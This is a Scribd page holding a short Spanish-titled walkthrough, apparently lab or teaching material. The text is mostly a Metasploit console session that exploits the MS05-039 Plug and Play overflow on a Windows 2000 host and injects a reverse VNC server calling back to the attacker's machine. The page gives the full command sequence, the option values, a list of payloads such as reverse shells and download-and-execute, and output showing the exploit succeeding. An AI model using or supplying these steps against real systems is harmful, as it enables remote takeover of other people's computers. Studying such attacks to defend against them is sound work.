Scribd
Upload
346 views3 pages

Ataque Con Metasploit

1. The document describes using Metasploit to exploit the MS05-039 vulnerability to install a reverse VNC payload on a target system running Windows 2000. 2. Metasploit's ms05_039_pnp exploit and win32_reverse_vncinject payload are used to establish a connection back to the attacker's machine to inject a VNC server. 3. The exploit is executed against a target system at 192.168.202.5, using a reverse connection back to the attacker's machine at 192.168.202.153 on port 4321, which will launch a VNC session on port 5900.

Uploaded by

Jesus Rmz Peña
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
346 views3 pages

Ataque Con Metasploit

1. The document describes using Metasploit to exploit the MS05-039 vulnerability to install a reverse VNC payload on a target system running Windows 2000. 2. Metasploit's ms05_039_pnp exploit and win32_reverse_vncinject payload are used to establish a connection back to the attacker's machine to inject a VNC server. 3. The exploit is executed against a target system at 192.168.202.5, using a reverse connection back to the attacker's machine at 192.168.202.153 on port 4321, which will launch a VNC session on port 5900.

Uploaded by

Jesus Rmz Peña
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Ataque con Metasploit

Tomar el control via VNC, sin tenerlo instalado en ambos lados

Metasploit version: Framework v2.7

Exploit: ms05_039_pnp Microsoft PnP MS05-039 Overflow


Payload: win32_reverse_vncinject Windows Reverse VNC Server Inject

msf > show exploits

Metasploit Framework Loaded Exploits


====================================

msf > use ms05_039_pnp


msf ms05_039_pnp > show options

Exploit Options
===============

Exploit: Name Default Description


-------- ------- ------- ---------------------------------------
required RHOST The target address
required SMBPIPE browser Pipe name: browser, srvsvc, wkssvc
optional SMBDOM The domain for specified SMB username
required RPORT 139 The target port
optional SMBUSER The SMB username to connect with
optional SMBPASS The password for specified SMB username

Target: Target Not Specified

msf ms05_039_pnp > show payloads

Metasploit Framework Usable Payloads


====================================

win32_adduser Windows Execute net user /ADD


win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
msf ms05_039_pnp > set PAYLOAD win32_reverse_vncinject
PAYLOAD -> win32_reverse_vncinject

msf ms05_039_pnp(win32_reverse_vncinject) > show options

Exploit and Payload Options


===========================

Exploit: Name Default Description


-------- ------- ------- ---------------------------------------
required RHOST The target address
required SMBPIPE browser Pipe name: browser, srvsvc, wkssvc
optional SMBDOM The domain for specified SMB username
required RPORT 139 The target port
optional SMBUSER The SMB username to connect with
optional SMBPASS The password for specified SMB username

Payload: Name Default Description


-------- -------- ------------------------------- ----------------------------------
--------
required VNCDLL /home/framework/data/vncdll.dll The full path the VNC service dll
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required AUTOVNC 1 Automatically launch vncviewer
required VNCPORT 5900 The local port to use for the VNC proxy
required LPORT 4321 Local port to receive connection

Target: Target Not Specified

msf ms05_039_pnp(win32_reverse_vncinject) > set RHOST 192.168.202.5


RHOST -> 192.168.202.5

msf ms05_039_pnp(win32_reverse_vncinject) > set RPORT 139


RPORT -> 139

msf ms05_039_pnp(win32_reverse_vncinject) > set LHOST 192.168.202.153


LHOST -> 192.168.202.153

msf ms05_039_pnp(win32_reverse_vncinject) > show targets

Supported Exploit Targets


=========================

0 Windows 2000 SP0-SP4 English


1 Windows 2000 SP4 English/French/German/Dutch
2 Windows 2000 SP4 French
3 Windows 2000 SP4 Spanish
4 Windows 2000 SP0-SP4 German
5 Windows 2000 SP0-SP4 Italian
6 Windows XP SP1

msf ms05_039_pnp(win32_reverse_vncinject) > set TARGET 0


TARGET -> 0
msf ms05_039_pnp(win32_reverse_vncinject) > exploit

[*] Starting Reverse Handler.


[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.202.153:4321 <-> 192.168.202.5:1314
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (348170), Please wait...
[*] Upload completed
[*] VNC proxy listening on port 5900...
[*] VNC proxy finished

You might also like